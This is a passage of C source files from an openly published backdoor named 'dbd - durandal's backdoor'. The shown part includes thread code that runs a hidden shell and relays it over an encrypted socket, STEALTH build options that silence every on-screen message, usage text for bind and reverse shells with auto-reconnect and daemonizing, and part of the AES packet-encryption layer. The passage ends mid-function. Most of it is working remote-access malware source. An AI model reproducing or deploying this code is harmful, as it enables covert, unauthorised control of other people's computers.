297 | Session->ClientSocket = INVALID_SOCKET; 298 | 299 | // TerminateThread(Session->WriteShellThreadHandle, 0); 300 | Session->QuitAllThreads = 1; 301 | return(FALSE); 302 | } 303 | 304 | // 305 | // Wait for either thread or the shell process to finish 306 | // 307 | 308 | HandleArray[0] = Session->ReadShellThreadHandle; 309 | HandleArray[1] = Session->WriteShellThreadHandle; 310 | HandleArray[2] = Session->ProcessHandle; 311 | 312 | i = WaitForMultipleObjects(3, HandleArray, FALSE, INFINITE); 313 | 314 | switch (i) { 315 | case WAIT_OBJECT_0 + 0: 316 | // TerminateThread(Session->WriteShellThreadHandle, 0); 317 | TerminateProcess(Session->ProcessHandle, 1); 318 | break; 319 | 320 | case WAIT_OBJECT_0 + 1: 321 | // TerminateThread(Session->ReadShellThreadHandle, 0); 322 | TerminateProcess(Session->ProcessHandle, 1); 323 | break; 324 | case WAIT_OBJECT_0 + 2: 325 | // TerminateThread(Session->WriteShellThreadHandle, 0); 326 | // TerminateThread(Session->ReadShellThreadHandle, 0); 327 | break; 328 | 329 | default: 330 | #ifndef WINMAIN 331 | if (!quiet) 332 | fprintf(stderr, "WaitForMultipleObjects error (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 333 | #else 334 | #ifndef STEALTH 335 | if (!quiet) 336 | displayAmbitiousErrbox("WaitForMultipleObjects error!\n", GetLastError()); 337 | #endif 338 | #endif 339 | break; 340 | } 341 | 342 | Session->QuitAllThreads = 1; 343 | 344 | /* give the threads some time to exit */ 345 | Sleep(100); 346 | 347 | 348 | // Close my handles to the threads, the shell process, and the shell pipes 349 | closesocket(Session->ClientSocket); 350 | 351 | 352 | DisconnectNamedPipe(Session->ReadPipeHandle); 353 | CloseHandle(Session->ReadPipeHandle); 354 | 355 | DisconnectNamedPipe(Session->WritePipeHandle); 356 | CloseHandle(Session->WritePipeHandle); 357 | 358 | 359 | CloseHandle(Session->ReadShellThreadHandle); 360 | CloseHandle(Session->WriteShellThreadHandle); 361 | 362 | CloseHandle(Session->ProcessHandle); 363 | 364 | free(Session); 365 | 366 | return(TRUE); 367 | } 368 | 369 | 370 | // ********************************************************************** 371 | // 372 | // StartShell 373 | // 374 | // Execs the shell with the specified handle as stdin, stdout/err 375 | // 376 | // Returns process handle or NULL on failure 377 | // 378 | 379 | static HANDLE 380 | StartShell( 381 | HANDLE ShellStdinPipeHandle, 382 | HANDLE ShellStdoutPipeHandle 383 | ) 384 | { 385 | PROCESS_INFORMATION ProcessInformation; 386 | STARTUPINFO si; 387 | HANDLE ProcessHandle = NULL; 388 | 389 | ZeroMemory( &si, sizeof(STARTUPINFO) ); 390 | 391 | // 392 | // Initialize process startup info 393 | // 394 | si.cb = sizeof(STARTUPINFO); 395 | si.lpReserved = NULL; 396 | si.lpTitle = NULL; 397 | si.lpDesktop = NULL; 398 | si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L; 399 | si.wShowWindow = SW_HIDE; 400 | si.lpReserved2 = NULL; 401 | si.cbReserved2 = 0; 402 | 403 | si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 404 | 405 | si.hStdInput = ShellStdinPipeHandle; 406 | si.hStdOutput = ShellStdoutPipeHandle; 407 | 408 | DuplicateHandle(GetCurrentProcess(), ShellStdoutPipeHandle, 409 | GetCurrentProcess(), &si.hStdError, 410 | DUPLICATE_SAME_ACCESS, TRUE, 0); 411 | 412 | if (CreateProcess(NULL, program_to_execute, NULL, NULL, TRUE, 0, NULL, NULL, 413 | &si, &ProcessInformation)) { 414 | ProcessHandle = ProcessInformation.hProcess; 415 | CloseHandle(ProcessInformation.hThread); 416 | } else { 417 | #ifndef WINMAIN 418 | if (!quiet) 419 | fprintf(stderr, "failed to execute shell (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 420 | #else 421 | #ifndef STEALTH 422 | if (!quiet) 423 | displayAmbitiousErrbox("failed to execute shell!\n", GetLastError()); 424 | #endif 425 | #endif 426 | } 427 | 428 | return(ProcessHandle); 429 | } 430 | 431 | 432 | // ********************************************************************** 433 | // SessionReadShellThreadFn 434 | // 435 | // The read thread procedure. Reads from the pipe connected to the shell 436 | // process, writes to the socket. 437 | // 438 | 439 | static VOID 440 | SessionReadShellThreadFn( 441 | LPVOID Parameter 442 | ) 443 | { 444 | PSESSION_DATA Session = Parameter; 445 | BYTE Buffer[BUFFER_SIZE / 2]; 446 | BYTE Buffer2[BUFFER_SIZE]; 447 | DWORD BytesRead; 448 | 449 | 450 | // this bogus peek is here because win32 won't let me close the pipe if it is 451 | // in waiting for input on a read. 452 | while (PeekNamedPipe(Session->ReadPipeHandle, Buffer, sizeof(Buffer), 453 | &BytesRead, NULL, NULL)) 454 | { 455 | DWORD BufferCnt, BytesToWrite; 456 | BYTE PrevChar = 0; 457 | 458 | 459 | if (Session->QuitAllThreads) { 460 | ExitThread(0); 461 | } 462 | 463 | if (BytesRead > 0) { 464 | ReadFile(Session->ReadPipeHandle, Buffer, sizeof(Buffer), 465 | &BytesRead, NULL); 466 | } else { 467 | Sleep(20); 468 | continue; 469 | } 470 | 471 | // 472 | // Process the data we got from the shell: replace any naked LF's 473 | // with CR-LF pairs. 474 | // 475 | for (BufferCnt = 0, BytesToWrite = 0; BufferCnt < BytesRead; BufferCnt++) { 476 | if (Buffer[BufferCnt] == '\n' && PrevChar != '\r') 477 | Buffer2[BytesToWrite++] = '\r'; 478 | PrevChar = Buffer2[BytesToWrite++] = Buffer[BufferCnt]; 479 | } 480 | 481 | #ifndef WINMAIN 482 | if (snooping) { 483 | write(STDOUT_FILENO, Buffer2, BytesToWrite); 484 | } 485 | #endif 486 | if (use_encryption) { 487 | if (pel_send_msg(Session->ClientSocket, Buffer2, BytesToWrite) != PEL_SUCCESS) { 488 | #ifdef DEBUG 489 | #ifndef WINMAIN 490 | fprintf(stderr, "pel_send_msg failed\n"); 491 | #else 492 | errbox("pel_send_msg failed!"); 493 | #endif 494 | #endif 495 | break; 496 | } 497 | } else { 498 | if (send(Session->ClientSocket, Buffer2, BytesToWrite, 0) <= 0) 499 | break; 500 | } 501 | 502 | } 503 | 504 | if ((GetLastError() != ERROR_BROKEN_PIPE)) { 505 | #ifndef WINMAIN 506 | if (!quiet) 507 | fprintf(stderr, "SessionReadShellThreadFn exitted (net helpmsg %s)\n", itoa(GetLastError(), smbuff, 10)); 508 | #else 509 | #ifndef STEALTH 510 | if (!quiet) 511 | displayAmbitiousErrbox("SessionReadShellThreadFn exitted!\n", GetLastError()); 512 | #endif 513 | #endif 514 | } 515 | 516 | ExitThread(0); 517 | } 518 | 519 | 520 | // ********************************************************************** 521 | // SessionWriteShellThreadFn 522 | // 523 | // The write thread procedure. Reads from socket, writes to pipe connected 524 | // to shell process. 525 | 526 | 527 | static VOID 528 | SessionWriteShellThreadFn( 529 | LPVOID Parameter 530 | ) 531 | { 532 | PSESSION_DATA Session = Parameter; 533 | BYTE Buffer[BUFFER_SIZE]; 534 | BYTE secondary_buffer[BUFFER_SIZE * 2]; 535 | DWORD BytesWritten; 536 | // BYTE RecvBuffer[1]; 537 | // BYTE EchoBuffer[5]; 538 | // DWORD BufferCnt, EchoCnt; 539 | 540 | int previouschar = 0; 541 | int nextchar; 542 | 543 | /* the original code has been modified, replaced with the code below 544 | -- (C) 2004 Michel Blomgren */ 545 | while (1) { 546 | fd_set fds; 547 | struct timeval tv; 548 | 549 | FD_ZERO(&fds); 550 | FD_SET(Session->ClientSocket, &fds); 551 | 552 | tv.tv_sec = 0; 553 | tv.tv_usec = 50; 554 | 555 | if (Session->QuitAllThreads) { 556 | break; 557 | } 558 | 559 | if (select(FD_SETSIZE, &fds, NULL, NULL, &tv) != SOCKET_ERROR) { 560 | int i, x; 561 | int cnt; 562 | 563 | if (FD_ISSET(Session->ClientSocket, &fds)) { 564 | if (use_encryption) { 565 | cnt = sizeof(Buffer); 566 | if (pel_recv_msg(Session->ClientSocket, Buffer, &cnt) != PEL_SUCCESS) { 567 | break; 568 | } 569 | if (cnt == 0) { 570 | break; 571 | } 572 | } else { 573 | if ((cnt = recv(Session->ClientSocket, Buffer, sizeof(Buffer), 0)) == SOCKET_ERROR) { 574 | break; 575 | } 576 | if (cnt == 0) { 577 | break; 578 | } 579 | } 580 | 581 | if (convert_to_crlf) { 582 | /* convert any bare LF to CR+LF, and any bare CR to CR+LF */ 583 | /* warning: secondary_buffer must be * 2 to avoid bof */ 584 | /* code is (C) 2004 Michel Blomgren */ 585 | for (i = 0, x = 0; i < cnt; i++) { 586 | if (i < (cnt-1)) { 587 | nextchar = Buffer[i+1]; 588 | } else { 589 | nextchar = 0; 590 | } 591 | if ((Buffer[i] == '\n') && (previouschar != '\r')) { 592 | secondary_buffer[x++] = '\r'; 593 | secondary_buffer[x++] = Buffer[i]; 594 | } else if ((Buffer[i] == '\r') && (nextchar != '\n')) { 595 | secondary_buffer[x++] = '\r'; 596 | secondary_buffer[x++] = '\n'; 597 | } else { 598 | secondary_buffer[x++] = Buffer[i]; 599 | } 600 | previouschar = Buffer[i]; 601 | } 602 | secondary_buffer[x++] = 0; 603 | cnt = strlen(secondary_buffer); 604 | /* end LF/CR conversion */ 605 | } else { 606 | for (i = 0, x = 0; i < cnt; i++) { 607 | secondary_buffer[x++] = Buffer[i]; 608 | } 609 | secondary_buffer[x++] = 0; 610 | } 611 | 612 | if (Session->QuitAllThreads) { 613 | break; 614 | } 615 | 616 | #ifndef WINMAIN 617 | if (snooping) { 618 | if (highlight_incoming) { 619 | write(STDOUT_FILENO, highlight_prefix, strlen(highlight_prefix)); 620 | write(STDOUT_FILENO, secondary_buffer, cnt); 621 | write(STDOUT_FILENO, highlight_suffix, strlen(highlight_suffix)); 622 | } else { 623 | write(STDOUT_FILENO, secondary_buffer, cnt); 624 | } 625 | } 626 | #endif 627 | if (! WriteFile(Session->WritePipeHandle, secondary_buffer, cnt, &BytesWritten, NULL)) { 628 | break; 629 | } 630 | } 631 | } else { 632 | break; 633 | } 634 | 635 | } 636 | 637 | /* original code (vuln to a bof): 638 | // 639 | // Loop, reading one byte at a time from the socket. 640 | // 641 | while (recv(Session->ClientSocket, RecvBuffer, sizeof(RecvBuffer), 0) != 0) { 642 | EchoCnt = 0; 643 | 644 | Buffer[BufferCnt++] = EchoBuffer[EchoCnt++] = RecvBuffer[0]; 645 | if (RecvBuffer[0] == '\r') 646 | Buffer[BufferCnt++] = EchoBuffer[EchoCnt++] = '\n'; 647 | 648 | 649 | // Trap exit as it causes problems 650 | if (strnicmp(Buffer, "exit\r\n", 6) == 0) 651 | ExitThread(0); 652 | 653 | // 654 | // If we got a CR, it's time to send what we've buffered up down to the 655 | // shell process. 656 | // 657 | if (RecvBuffer[0] == '\n' || RecvBuffer[0] == '\r') { 658 | if (! WriteFile(Session->WritePipeHandle, Buffer, BufferCnt, 659 | &BytesWritten, NULL)) 660 | { 661 | break; 662 | } 663 | BufferCnt = 0; 664 | } 665 | } 666 | */ 667 | 668 | ExitThread(0); 669 | } 670 | -------------------------------------------------------------------------------- /misc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * dbd - durandal's backdoor 3 | * Copyright (C) 2013 Kyle Barnthouse 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms of the GNU General Public License as published by the Free 7 | * Software Foundation; either version 2 of the License, or (at your option) 8 | * any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, but WITHOUT 11 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 12 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 13 | * more details. 14 | * 15 | * You should have received a copy of the GNU General Public License along 16 | * with this program; if not, write to the Free Software Foundation, Inc., 59 17 | * Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | * 19 | * See the COPYING file for more information. 20 | */ 21 | 22 | 23 | #ifdef WIN32 24 | char *WSAstrerror(DWORD my_wsagetlasterror) { 25 | switch (my_wsagetlasterror) { 26 | case WSABASEERR: 27 | return "WSABASEERR"; 28 | case WSAEINTR: 29 | return "WSAEINTR"; 30 | case WSAEBADF: 31 | return "WSAEBADF"; 32 | case WSAEACCES: 33 | return "WSAEACCES"; 34 | case WSAEFAULT: 35 | return "WSAEFAULT"; 36 | case WSAEINVAL: 37 | return "WSAEINVAL"; 38 | case WSAEMFILE: 39 | return "WSAEMFILE"; 40 | case WSAEWOULDBLOCK: 41 | return "WSAEWOULDBLOCK"; 42 | case WSAEINPROGRESS: 43 | return "WSAEINPROGRESS"; 44 | case WSAEALREADY: 45 | return "WSAEALREADY"; 46 | case WSAENOTSOCK: 47 | return "WSAENOTSOCK"; 48 | case WSAEDESTADDRREQ: 49 | return "WSAEDESTADDRREQ"; 50 | case WSAEMSGSIZE: 51 | return "WSAEMSGSIZE"; 52 | case WSAEPROTOTYPE: 53 | return "WSAEPROTOTYPE"; 54 | case WSAENOPROTOOPT: 55 | return "WSAENOPROTOOPT"; 56 | case WSAEPROTONOSUPPORT: 57 | return "WSAEPROTONOSUPPORT"; 58 | case WSAESOCKTNOSUPPORT: 59 | return "WSAESOCKTNOSUPPORT"; 60 | case WSAEOPNOTSUPP: 61 | return "WSAEOPNOTSUPP"; 62 | case WSAEPFNOSUPPORT: 63 | return "WSAEPFNOSUPPORT"; 64 | case WSAEAFNOSUPPORT: 65 | return "WSAEAFNOSUPPORT"; 66 | case WSAEADDRINUSE: 67 | return "WSAEADDRINUSE"; 68 | case WSAEADDRNOTAVAIL: 69 | return "WSAEADDRNOTAVAIL"; 70 | case WSAENETDOWN: 71 | return "WSAENETDOWN"; 72 | case WSAENETUNREACH: 73 | return "WSAENETUNREACH"; 74 | case WSAENETRESET: 75 | return "WSAENETRESET"; 76 | case WSAECONNABORTED: 77 | return "WSAECONNABORTED"; 78 | case WSAECONNRESET: 79 | return "WSAECONNRESET"; 80 | case WSAENOBUFS: 81 | return "WSAENOBUFS"; 82 | case WSAEISCONN: 83 | return "WSAEISCONN"; 84 | case WSAENOTCONN: 85 | return "WSAENOTCONN"; 86 | case WSAESHUTDOWN: 87 | return "WSAESHUTDOWN"; 88 | case WSAETOOMANYREFS: 89 | return "WSAETOOMANYREFS"; 90 | case WSAETIMEDOUT: 91 | return "WSAETIMEDOUT"; 92 | case WSAECONNREFUSED: 93 | return "WSAECONNREFUSED"; 94 | case WSAELOOP: 95 | return "WSAELOOP"; 96 | case WSAENAMETOOLONG: 97 | return "WSAENAMETOOLONG"; 98 | case WSAEHOSTDOWN: 99 | return "WSAEHOSTDOWN"; 100 | case WSAEHOSTUNREACH: 101 | return "WSAEHOSTUNREACH"; 102 | case WSAENOTEMPTY: 103 | return "WSAENOTEMPTY"; 104 | case WSAEPROCLIM: 105 | return "WSAEPROCLIM"; 106 | case WSAEUSERS: 107 | return "WSAEUSERS"; 108 | case WSAEDQUOT: 109 | return "WSAEDQUOT"; 110 | case WSAESTALE: 111 | return "WSAESTALE"; 112 | case WSAEREMOTE: 113 | return "WSAEREMOTE"; 114 | case WSAEDISCON: 115 | return "WSAEDISCON"; 116 | case WSASYSNOTREADY: 117 | return "WSASYSNOTREADY"; 118 | case WSAVERNOTSUPPORTED: 119 | return "WSAVERNOTSUPPORTED"; 120 | case WSANOTINITIALISED: 121 | return "WSANOTINITIALISED"; 122 | case WSAHOST_NOT_FOUND: 123 | return "WSAHOST_NOT_FOUND"; 124 | case WSATRY_AGAIN: 125 | return "WSATRY_AGAIN"; 126 | case WSANO_RECOVERY: 127 | return "WSANO_RECOVERY"; 128 | case WSANO_DATA: 129 | return "WSANO_DATA"; 130 | default: 131 | return "Unknown winsock error"; 132 | } 133 | } 134 | #endif 135 | 136 | 137 | #if defined WIN32 && defined WINMAIN && defined STEALTH 138 | /*nop*/ 139 | #else 140 | /* get RCS id */ 141 | unsigned char *get_revision(unsigned char *string) { 142 | /* 143 | * input string is an RCS Id keyword 144 | */ 145 | char Id_string[] = "$Id: "; 146 | char *idstart; 147 | static unsigned char revision[16]; 148 | int i, x, column_counter; 149 | 150 | if (!(idstart = strstr(string, Id_string))) { 151 | return NULL; 152 | } 153 | 154 | idstart += strlen(Id_string); 155 | 156 | column_counter = 1; 157 | for (i = 0, x = 0; x < (sizeof(revision)-1); i++) { 158 | if (idstart[i] == 0) 159 | return NULL; 160 | 161 | if (column_counter < 2) { 162 | if (idstart[i] == 0x20) 163 | column_counter++; 164 | } else { /* column 2 is the rcs revision number */ 165 | if (((idstart[i] < '0') || (idstart[i] > '9')) && (idstart[i] != '.')) 166 | break; 167 | revision[x] = idstart[i]; 168 | x++; 169 | } 170 | } 171 | 172 | revision[x] = 0; 173 | return revision; 174 | } 175 | #endif 176 | 177 | 178 | #if defined WIN32 && defined WINMAIN 179 | 180 | /* 181 | ParseCommandLine() was derived from some forum (forgot which) :\ 182 | author is unknown to me! 183 | */ 184 | void ParseCommandLine (LPSTR lpCmdLine) { 185 | argc = 1; 186 | 187 | if (!(argv[0] = strdup("smb.exe"))) { 188 | #ifndef STEALTH 189 | MessageBox(NULL, "strdup() failed!", "error!", MB_OK | MB_ICONERROR); 190 | #endif 191 | exit(1); 192 | } 193 | 194 | while (*lpCmdLine && (argc < MAX_NUM_ARGVS)) { 195 | while (*lpCmdLine && ((*lpCmdLine <= 32) || (*lpCmdLine > 126))) { 196 | lpCmdLine++; 197 | } 198 | if (*lpCmdLine) { 199 | argv[argc] = lpCmdLine; 200 | argc++; 201 | while (*lpCmdLine && ((*lpCmdLine > 32) && (*lpCmdLine <= 126))) { 202 | lpCmdLine++; 203 | } 204 | if (*lpCmdLine) { 205 | *lpCmdLine = 0; 206 | lpCmdLine++; 207 | } 208 | } 209 | } 210 | } 211 | 212 | #ifndef STEALTH 213 | /* return "on" or "off" if an int is 1 or 0 respectively */ 214 | char *on_or_off(int boolean) { 215 | if (boolean) 216 | return "on"; 217 | else 218 | return "off"; 219 | } 220 | 221 | void message_box_usage(void) { 222 | char buf[2048]; 223 | 224 | snprintf(buf, sizeof(buf), 225 | "dbd %s Copyright (C) 2013 Kyle Barnthouse \n" 226 | "\n" 227 | "connect (tcp):dbdbg.exe [-options] host port\n" 228 | "listen (tcp): dbdbg.exe -l -p port [-options]\n" 229 | "-l : listen for incoming connection\n" 230 | "-p : choose port to listen on, or source port to connect from\n" 231 | "-a : choose address to listen on or connect out from\n" 232 | "-e exe : program to execute after connect, e.g.: -e cmd.exe\n" 233 | "-r n : infinitely reconnect, pause for n seconds between connects, use -r0 with -l\n" 234 | "-c on|off : turn on/off AES-128 encryption. default: -c %s\n" 235 | "-k secret : override hardcoded passphrase for the -c option\n" 236 | "-q : be quiet, don't show MessageBoxes\n" 237 | "-n : numeric-only IP addresses, don't do DNS resolution.\n" 238 | "-V : show a MessageBox with version info\n" 239 | "\n" 240 | "win32 specific options:\n" 241 | "-D on|off : turn on/off whether to detach from the console. default is: -D %s\n" 242 | "-X on|off : turn on/off conversion of LF/CR to CR+LF (only for -e). default is: -X %s\n" 243 | "-1 on|off : turn on/off whether to run only one instance of dbd or not. default is: -1 %s\n", 244 | get_revision(rcsid), 245 | on_or_off(use_encryption), 246 | on_or_off(daemonize), 247 | on_or_off(convert_to_crlf), 248 | on_or_off(only_one_instance)); 249 | 250 | if (!quiet) 251 | MessageBox(NULL, buf, "dbd usage", MB_OK); 252 | 253 | return; 254 | } 255 | 256 | /* error MessageBox */ 257 | void errbox(char *msg) { 258 | MessageBox(NULL, msg, "dbd", MB_OK | MB_ICONERROR); 259 | return; 260 | } 261 | 262 | 263 | void displayAmbitiousErrbox(char *prefix, DWORD err) { 264 | LPVOID lpMsgBuf; 265 | char msg[256]; 266 | 267 | if (!FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 268 | NULL, 269 | err, 270 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language 271 | (LPTSTR) &lpMsgBuf, 272 | 0, 273 | NULL )) { 274 | /* handle error */ 275 | return; 276 | } 277 | snprintf(msg, sizeof(msg), "%s%u: %s", 278 | prefix, (unsigned int)err, (char *)lpMsgBuf); 279 | errbox(msg); 280 | LocalFree(lpMsgBuf); 281 | } 282 | 283 | 284 | /* info MessageBox */ 285 | void infobox(char *msg) { 286 | MessageBox(NULL, msg, "dbd", MB_OK | MB_ICONINFORMATION); 287 | return; 288 | } 289 | 290 | /* winsock error MessageBox */ 291 | void wsaerrbox(char *msg, DWORD wsaerr) { 292 | char buf[256]; 293 | snprintf(buf, sizeof(buf), "%s: %s", msg, WSAstrerror(wsaerr)); 294 | MessageBox(NULL, buf, "dbd", MB_OK | MB_ICONERROR); 295 | return; 296 | } 297 | 298 | /* display version info MessageBox */ 299 | void verbox(void) { 300 | char buf1[1024]; 301 | char buf2[16]; 302 | 303 | snprintf(buf1, sizeof(buf1), "dbd %s Copyright (C) 2013 Kyle Barnthouse \n" 304 | "%s\n" 305 | "http://gitbrew.org\n" 306 | "dbd is distributed under the GNU General Public License v2", 307 | get_revision(rcsid), rcsid); 308 | snprintf(buf2, sizeof(buf2), "dbd %s", get_revision(rcsid)); 309 | 310 | MessageBox(NULL, buf1, buf2, MB_OK | MB_ICONINFORMATION); 311 | 312 | return; 313 | } 314 | 315 | 316 | /* 317 | a non-blocking MessageBox. 318 | this is implemented by creating a thread (quite lame approach, I know, but 319 | it's what I got) :\ 320 | */ 321 | 322 | typedef struct { 323 | char *msg; 324 | int thread_lock; 325 | } mbstruct, *pmbstruct; 326 | 327 | static VOID messagebox_thread(LPVOID Parameter) { 328 | pmbstruct mbs = Parameter; 329 | char buf[512]; 330 | strncpy(buf, mbs->msg, sizeof(buf)); 331 | mbs->thread_lock = 0; 332 | MessageBox(NULL, buf, "dbd", MB_OK); 333 | ExitThread(0); 334 | } 335 | 336 | void forkmsgbox(char *msg, int length) { 337 | char *omsg; 338 | pmbstruct m; 339 | DWORD ThreadId; 340 | HANDLE h; 341 | 342 | if (!length) 343 | return; 344 | 345 | /* shorten length */ 346 | if (length > 500) 347 | length = 500; 348 | 349 | if (!(omsg = malloc(length+1))) 350 | return; 351 | 352 | memcpy(omsg, msg, length); 353 | omsg[length] = 0; 354 | 355 | if (!(m = (pmbstruct) malloc(sizeof(mbstruct)))) { 356 | free(omsg); 357 | return; 358 | } 359 | 360 | m->msg = omsg; 361 | m->thread_lock = 1; 362 | 363 | h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) messagebox_thread, 364 | (LPVOID) m, 0, &ThreadId); 365 | 366 | if (h) { 367 | CloseHandle(h); 368 | while (m->thread_lock == 1) { 369 | Sleep(50); 370 | continue; 371 | } 372 | Sleep(50); 373 | } 374 | 375 | free(m); 376 | free(omsg); 377 | return; 378 | } 379 | 380 | #endif 381 | 382 | 383 | 384 | #else 385 | /* for unix and win32 console app */ 386 | 387 | /* 388 | * print_banner() prints version and copyright info 389 | */ 390 | void print_version(void) { 391 | printf("dbd %s Copyright (C) 2013 Kyle Barnthouse \n" 392 | "%s\n" 393 | "\n" 394 | "This program is free software; you can redistribute it and/or modify it under\n" 395 | "the terms of the GNU General Public License as published by the Free Software\n" 396 | "Foundation; either version 2 of the License, or (at your option) any later\n" 397 | "version.\n", 398 | get_revision(rcsid), rcsid); 399 | return; 400 | } 401 | 402 | /* return "on" or "off" if an int is 1 or 0 respectively */ 403 | char *on_or_off(int boolean) { 404 | if (boolean) 405 | return "on"; 406 | else 407 | return "off"; 408 | } 409 | 410 | /* 411 | * usage() prints dbd syntax/usage info 412 | */ 413 | void usage(void) { 414 | print_version(); 415 | printf( 416 | "\n" 417 | "connect (tcp): dbd [-options] host port\n" 418 | "listen (tcp): dbd -l -p port [-options]\n" 419 | "options:\n" 420 | " -l listen for incoming connection\n" 421 | " -p n choose port to listen on, or source port to connect out from\n" 422 | " -a address choose an address to listen on or connect out from\n" 423 | " -e prog program to execute after connect (e.g. -e cmd.exe or -e bash)\n" 424 | " -r n infinitely respawn/reconnect, pause for n seconds between\n" 425 | " connection attempts. -r0 can be used to re-listen after\n" 426 | " disconnect (just like a regular daemon)\n" 427 | " -c on|off encryption on/off. specify whether you want to use the built-in\n" 428 | " AES-CBC-128 + HMAC-SHA1 encryption implementation (by\n" 429 | " Christophe Devine - http://www.cr0.net:8040/) or not\n" 430 | " default is: -c %s\n" 431 | " -k secret override default phrase to use for encryption (secret must be\n" 432 | " shared between client and server)\n" 433 | " -q hush, quiet, don't print anything (overrides -v)\n" 434 | " -v be verbose\n" 435 | " -n toggle numeric-only IP addresses (don't do DNS resolution). if\n" 436 | " you specify -n twice, original state will be active (i.e. -n\n" 437 | " works like a on/off switch)\n" 438 | " -m toggle monitoring (snooping) on/off (only used with the -e\n" 439 | " option). snooping can also be turned on by specifying -vv (-v\n" 440 | " two times)\n" 441 | " -P prefix add prefix (+ a hardcoded separator) to all outbound data.\n" 442 | " this option is mostly only useful for dbd in \"chat mode\" (to\n" 443 | " prefix lines you send with your nickname)\n" 444 | " -H on|off highlight incoming data with a hardcoded (color) escape\n" 445 | " sequence (for e.g. chatting). default is: -H %s\n" 446 | " -V print version banner and exit (include that output in your\n" 447 | " bug report and send bug report to michel.blomgren@tigerteam.se)\n" 448 | #ifdef WIN32 449 | "win32 specific options:\n" 450 | " -D on|off detach from console (FreeConsole()) (on=yes or off=no)\n" 451 | " default is: -D %s\n" 452 | " -X on|off when using the -e option, translate incoming bare LFs or CRs\n" 453 | " to CR+LF (this must be on if you're executing command.com on\n" 454 | " Win9x). default is: -X %s\n" 455 | " -1 on|off whether to make dbd run only one instance of itself or not.\n" 456 | " instance check is implemented using CreateSemaphore() (with an\n" 457 | " initcount and maxcount of 1) and WaitForSingleObject(). if\n" 458 | " WaitForSingleObject() returns WAIT_TIMEOUT we assume there's\n" 459 | " already an instance running. default is: -1 %s\n" 460 | "note: when receiving files under win32, always use something like this:\n" 461 | "C:\\>dbd -lvp 1234 < NUL > outfile.ext\n", 462 | on_or_off(use_encryption), 463 | on_or_off(highlight_incoming), 464 | on_or_off(daemonize), 465 | on_or_off(convert_to_crlf), 466 | on_or_off(only_one_instance)); 467 | #else 468 | "unix-like OS specific options:\n" 469 | " -s invoke a shell, nothing else. if dbd is setuid 0, it'll invoke\n" 470 | " a root shell\n" 471 | " -w n \"immobility timeout\" in seconds for idle read/write operations\n" 472 | " and program execution (the -e option)\n" 473 | " -D on|off fork and run in background (daemonize). default: -D %s\n", 474 | on_or_off(use_encryption), 475 | on_or_off(highlight_incoming), 476 | on_or_off(daemonize)); 477 | #endif 478 | 479 | return; 480 | } 481 | 482 | #endif 483 | 484 | -------------------------------------------------------------------------------- /mktarball.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | name="dbd" 4 | version="`cat dbd.c | grep '$Id: dbd.c,v' | cut -d' ' -f3`" 5 | files="dbd.c dbd.h doexec.c pel.c aes.c sha1.c socket_code.h pel.h aes.h sha1.h doexec_unix.h doexec_win32.h readwrite.h misc.h Makefile mktarball.sh README COPYING CHANGES binaries" 6 | 7 | echo "[i] making tarball..." 8 | mkdir $name-$version 9 | tar --exclude=CVS -cf temporaryplace-$version.tar $files 10 | tar -C $name-$version -xf temporaryplace-$version.tar 11 | rm -f $name-$version.tar.gz 12 | tar -czf $name-$version.tar.gz --numeric-owner $name-$version 13 | rm -rf $name-$version 14 | rm -rf temporaryplace-$version.tar 15 | chmod 0644 $name-$version.tar.gz 16 | echo "[i] done" 17 | 18 | -------------------------------------------------------------------------------- /pel.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Packet Encryption Layer for Tiny SHell, 3 | * by Christophe Devine ; 4 | * this program is licensed under the GPL. 5 | * 6 | * Shamelessly ripped by Kyle Barnthouse for dbd, April 2012 7 | * Originally Ported to Win32 by Michel Blomgren for sbd, June 2004 8 | * 9 | * WARNING!!! The receiving buffer can _NOT_ be less than BUFSIZE (defined in 10 | * pel.h) otherwise a buffer overflow will occur! //Michel 11 | */ 12 | 13 | #ifdef WIN32 14 | #define __USE_WIN32_SOCKETS 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #else 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #endif 27 | 28 | #include "pel.h" 29 | #include "aes.h" 30 | #include "sha1.h" 31 | 32 | /* global data */ 33 | 34 | int pel_errno; 35 | 36 | struct pel_context 37 | { 38 | /* AES-CBC-128 variables */ 39 | 40 | aes_context SK; /* Rijndael session key */ 41 | unsigned char LCT[16]; /* last ciphertext block */ 42 | 43 | /* HMAC-SHA1 variables */ 44 | 45 | unsigned char k_ipad[64]; /* inner padding */ 46 | unsigned char k_opad[64]; /* outer padding */ 47 | unsigned long int p_cntr; /* packet counter */ 48 | }; 49 | 50 | struct pel_context send_ctx; /* to encrypt outgoing data */ 51 | struct pel_context recv_ctx; /* to decrypt incoming data */ 52 | 53 | unsigned char challenge[16] = /* version-specific */ 54 | "\x90\x6a\x9a\xee\x57\x03\x2f\xa4" \ 55 | "\x5e\xab\x07\xdf\xc4\x76\xf6\xf0"; 56 | /* above: challenge for sbd */ 57 | /* 58 | "\x6c\xd0\x47\x2c\x6d\x4b\x68\x20" \ 59 | "\xfc\x7d\x78\x91\xed\xe7\xa5\x44"; 60 | */ 61 | /* (above: challenge for rrs, below: challenge from tsh) 62 | "\x58\x90\xAE\x86\xF1\xB9\x1C\xF6" \ 63 | "\x29\x83\x95\x71\x1D\xDE\x58\x0D"; 64 | */ 65 | 66 | unsigned char buffer[BUFSIZE + 16 + 20]; 67 | 68 | /* function declaration */ 69 | 70 | void pel_setup_context( struct pel_context *pel_ctx, 71 | char *key, unsigned char IV[20] ); 72 | 73 | #ifdef WIN32 74 | int pel_send_all( SOCKET s, void *buf, size_t len, int flags 